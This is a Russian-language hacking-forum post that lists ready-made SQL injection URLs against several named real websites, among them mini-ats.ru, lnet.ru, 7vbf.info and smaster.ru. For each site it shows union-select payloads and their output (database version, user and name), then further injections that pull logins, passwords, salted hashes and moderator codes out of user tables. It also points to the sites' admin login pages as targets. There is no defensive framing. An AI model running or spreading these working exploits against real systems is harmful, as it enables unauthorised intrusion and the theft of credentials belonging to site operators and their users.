|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
www.mini-ats.ru, тИЦ=20
Код:
http://www.mini-ats.ru/ats.php?idc=-1%27+union+select+111,unhex(hex(concat(version(),':',user(),':',database()))),333,444,555,666/*
version() - 5.0.18-debug-log
user() - mats@localhost
database() - mats
похоже там был форум IPB но ссылка на него с главной страницы ведет в никуда(404)
Зато все его таблицы есть в БД. Логины и соленые хэши юзеров(бывших) вытаскиваются такой длинной инъекцией:
Код:
http://www.mini-ats.ru/ats.php?idc=-1'+union+select+111,concat(converge_id,':',unhex(hex(name)),':',unhex(hex(converge_pass_hash)),':',unhex(hex(converge_pass_salt))),333,444,555,666+from+ipb_members_converge,ipb_members+where+converge_id=id+limit+0,1/*
можно предположить что какой-то из этих пассов подойдет к админке c базовой авторизацией
www.mini-ats.ru/admin
-----------------------------------------------------
www.lnet.ru, тИЦ=110
Код:
http://www.lnet.ru/list.php?tid=-1+union+select+1,version(),3,4,5,user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20--
version() - 5.0.22
database() - bvpru_textov
user() - bvpru_textov@localhost
здесь есть масса таблиц с порнотекстами, что не может не радовать, но есть и таблицы с чем-то напоминающим пароли:
autors
autors3
system_user
этими инъекциями можно просмотреть их содержимое
Код:
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+0,1--
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors3+limit+0,1--
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(id,char(0x3A),login,char(0x3A),password,char(0x3A),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+system_user+limit+0,1--
здесь есть формы для входа
http://www.lnet.ru/admin.php
http://www.lnet.ru/autor.php
-----------------------------------------------------
7vbf.info, тИЦ=10
Код:
http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(version(),char(0x3A),user(),char(0x3A),database())--
version() - 5.0.51a-15
user() - web22_u1@localhost
database() - web22_db1
в таблице moderator есть поля pass и cod.
может там еще какие таблицы есть интересные, но по их названиям так не скажешь
Код:
http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(login,char(0x3A),pass,char(0x3A),cod)+from+moderator+limit+0,1--
-----------------------------------------------------
www.smaster.ru, тИЦ=80
Код:
http://www.smaster.ru/next/index.php?pid=-1+union+select+concat(version(),char(0x3A),user(),char(0x3A),database()),2,3,4,5/*
version() - 4.1.22-log
database() - smaster@localhost
user() - wwwsmasterru |